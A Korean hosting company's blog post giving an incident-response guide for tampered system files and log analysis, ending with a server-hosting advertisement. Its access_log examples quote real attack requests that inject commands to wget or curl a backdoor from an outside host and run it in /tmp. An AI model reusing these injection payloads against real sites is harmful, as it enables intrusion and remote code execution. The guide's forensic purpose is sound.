[Global Services]/해외서비스

홍콩,일본 서버호스팅 피싱대응 가이드 - 시스템 프로그램 파일 변조 점검,로그분석

이호스트ICT 2016. 4. 12. 18:56

 

 

 

 

시스템 프로그램 파일 변조 점검


루트킷에 의해 변조되는 경우를 포함하여 Trojan으로 자주 변경되는 시스템 파일들과 의심스러운 파일들이 점검대상이 되는데, 자동화된 프로그램 인 chkrootkit이나 RootkitHunter을 이용하면 쉽게 점검할 수 있습니다.

또는 다음과 같이 수작업으로도 확인 가능합니다.


[ system call 추적 ]

[root@localhost var]# strace -e trace=open ps

open“( /etc/ld.so.preload”, O_RDONLY) = -1 ENOENT (No such file or

directory)

open“( /etc/ld.so.cache”, O_RDONLY) = 3

open“( /lib/i686/libc.so.6”, O_RDONLY) = 3

open“( /dev/ttyop”, O_RDONLY) = 3


[ 파일의 무결성 검사 ]

RedHat계열의 경우 rpm커맨드를 이용해 파일 변경여부 점검가능


#rpm -V fileutils ← 패키지명

.M....G. /bin/df

S.5...GT /bin/ls

S.5....T c /etc/profile.d/colorls.sh

..5...GT /usr/bin/dir

[ 결과보기 ]

s : 프로그램의 사이즈가 변경, 5 : md5 checksum 값이 변경

T : 파일의 mtime 값이 변경


<참고 : 변경된 바이너리 복구방법 중 하나 - 포함된 패키지 강제설치>

- 변경된 바이너리가 포함된 패키지명 확인: #rpm -qf 바이너리명

예) [root@jjgosi board]# rpm -qf /bin/ps

     procps-2.0.7-8

- 강제 재설치 : # rpm -Uhv --force procps-2.0.7-8.rpm


로그 분석


접속자의 IP나 요청한 서비스의 성공여부, 시스템의 운영상 장애 등 로그를 통해 파악할 수 있는 사항은 많습니다. 관리자가 수동으로 로그파일을 분석하여 필요한 정보를 추출하는 방법은 로그분석 툴 보다 다양한 정보를 획득할 수 있고, 로그분석 툴을 이용하면 사람의 수작업보다 좀 더 신속하고 정확할 수 있다는 장단점이 있습니다.


그러나 공격에 성공하여 권한을 획득하면 로그 삭제 또는 변조했을 가능성이 크기 때문에 로그를 100%로 신뢰할 수는 없습니다.


[ .bash_history 로그 ]

bash 쉘을 이용하는 경우 사용자가 시스템에서 실행시킨 명령어가 모두

.bash_history 파일에 기록되므로, root나 최근 추가된 계정 등 의심스러

운 계정의 .bash_history 파일을 분석



[ 웹 access_log 로그 ]


최근 웹 어플리케이션 취약점을 이용해 웹서버 실행권한인 nobody나 apache 또는 daemon 등의 권한을 획득한 뒤 nobody 등의 권한으로 파일 업로드 및 실행이 가능한 /tmp, /var/tmp, /dev/shm 등의 디렉토리에 파일을 다운로드 받아 실행하는 형태의 사고가 많이 발생하고 있습니다.


􀙊 Apache 디폴트 access_log Format : “%h%l%u%t\”%r\”%>s%b”

h : remote Host l : logname u : user t : time

r : Firstline of request s : status b : byte sent


예) 제로보드 취약점 공격로그

print_category.php 파일의 injection 취약점을 이용해 백도어 프로그램(r0nin)을 /tmp 디렉토리에 업로드한 뒤 실행권한을 부여해 실행


/zboard/include/print_category.php?setup

=1&dir=http://www.~중략.com.xx/newcmd.gif?&cmd

=cd%20/tmp%20;%20wget%20http://nickvicq.xxx.net/BD/r0nin

HTTP/1.1”200 4892

/zboard/include/print_category.php?setup

=1&dir=http://www.~중략.com.br/newcmd.gif?&cmd

=cd%20/tmp%20;%20chmod%20777%20r0nin%20;%20./r0nin HTTP/1.1”

200 4204


access_log.1:xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] “GET

/cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_

BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;

cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl%20xxx.jinonet.

ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21 | HTTP/1.1”200 0


[ messages, secure 로그 ]


허가되지 않는 사용자가 원격에서 접속한 서비스(데몬)와 IP를 확인하고 접속성공(공격성공) 여부를 확인하는데도 도움이 됩니다.

예) 중국 IP로부터 8월 6일 10시 22분경 map, rpc 등 시스템에서 가지고 있을 법하거나 쉬운 패스워드를 사용하는 계정을 brute force공격(무작위로 대입)하여 몇 분 동안 ssh 접속시도 로그가 수십여 라인의 로그가 남겨짐


Aug 6 10:22:30 test sshd[7939]: Could not reverse map address

60.18.161.58

Aug 6 10:22:32 test sshd[7939]: Failed password for rpc from

60.18.161.58 port 28804 ssh2

~ 이하 생략


[ xferlog 로그 ]

FTP를 이용해 송수신한 파일명, 원격호스트, 전송방향, 접근모드, 사용자 계정 등의 정보를 확인할 수 있습니다.

예) 원격 호스트 test.abc.com에 ftp서비스로 접속하여 /home/test로 파일사이즈 가 14859인 tool.tar 파일 다운로드 한 로그


Sat Apr 21 00:53:44 2005 1 test.abc.com 14859 /home/test/tool.tar b _o r root ftp 0 *


[ last 로그 ]

last 명령어를 이용하면 해당 서버를 이용하는 각 계정 사용자들의 서버에 접속한 시간과 IP주소를 확인할 수 있습니다.

last에서 보이는 것은 ftp나 telnet, ssh 등 인증 후 접속에 성공한 로그만 남게 된다는 점을 주의해야 합니다. 또한 last에서 보이는 로그는 현재 속한 달의 로그만 보이게 되므로 지난달의 last 로그를 보려면 # last -f/var/log/wtmp.1과 같이 실행하면 됩니다.

 

 

 

 

보다 안정적인 국내/해외서비스를 이용하길 원하신다면 정답은 이호스트IDC에 있습니다. 

 

                    국내(한국) 서버호스팅                         일본 서버호스팅
 ○ Intel® Xeon® Octa Core E5-2670 x 2CPU
     24GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps		  ○ Intel Xeon Quad Core L5520 x 2CPU (센다이)
     24GB DDR RAM , 1TB SATA3 HDD 구성
 ○ Intel® Xeon® Quad Core L5520 x 2CPU
     24GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps		  ○ Intel Xeon Quad Core E3-1260L 2.40 GHz (도쿄)
     8GB DDR RAM ,  1TB SATA3 , 15Mbps
 ○ Intel® Xeon® Quad Core E3 1230
     8GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps		  ○ Intel Xeon Hexa(Six) Core L5640 x 2CPU (센다이)
     24GB DDR RAM , 1TB SATA3 HDD 구성
                        국내 코로케이션             일본 서버호스팅의 필수 보안서비스
 1U 80,000원 / 2U 100,000원 / 4U 130,000원
 쿼터 220,000원 / 하프 370,000원 / 풀 670,000원		       DDoS(디도스) 보안서비스 + 웹방화벽 패키지
                 서비스 문의(070-7600-5513)
 1. 디도스 우회 proxy 보안서비스를 통한 웹서버 IP 숨김지원
                        무료 보안 컨설팅  2. 웹취약점을 통한 로그인 탈취 및 데이터
    손실 방어를 위한 실시간 웹방화벽 차단서비스
      귀사의 서버에 보안침해를 경험하셨거나,
      보안취약점 점검을 받아보시고자 하시면
      언제든지 전화 및 메일 주시면 보안취약성
      점검을 통한 보안레포트를 제공해드리겠습니다.
      보안취약성 점검을 위한 무상장비는
      웹방화벽, IPS 무상 지원해드립니다.		                         홍콩 서버호스팅
 ○ Intel Xeon E3-1230Lv3 Core
     8GB DDR RAM / 500GB SATA 구성
 ○ Intel Xeon E3-1230Lv3 Core
     8GB DDR RAM / 128 SSD 구성
                                                              서비스문의
 ◎ IDC사업부 : 070-7600-5513(3095, 7311)  ◎ 메일주소 : request@ehostidc.co.kr
 ◎ 스카이프   : Sales_Team_EhostIDC ( 또는 '이호스트' 검색)
 ◎ 신청문의   : http://cc.ehostidc.co.kr/index.php?/cart/

 

저작자표시 비영리 변경금지

'[Global Services] > 해외서비스' 카테고리의 다른 글

EhostIDC. 코로케이션,서버호스팅,국내외 IDC 센터 소개  (0) 2017.02.02
EhostIDC. 한국,일본,홍콩 DDoS(디도스 보안)방어 서비스 안내  (0) 2017.01.02
해외(홍콩,일본,러시아) 서버호스팅 매니지먼트 서비스  (0) 2016.04.11
전세계 해외 네트워크구축 글로벌 서버호스팅  (0) 2016.04.07
해외(일본호스팅,홍콩호스팅)서버는 이호스트와 함께!  (0) 2016.04.04

'[Global Services]/해외서비스'의 다른글

  • 현재글홍콩,일본 서버호스팅 피싱대응 가이드 - 시스템 프로그램 파일 변조 점검,로그분석

관련글

댓글

티스토리툴바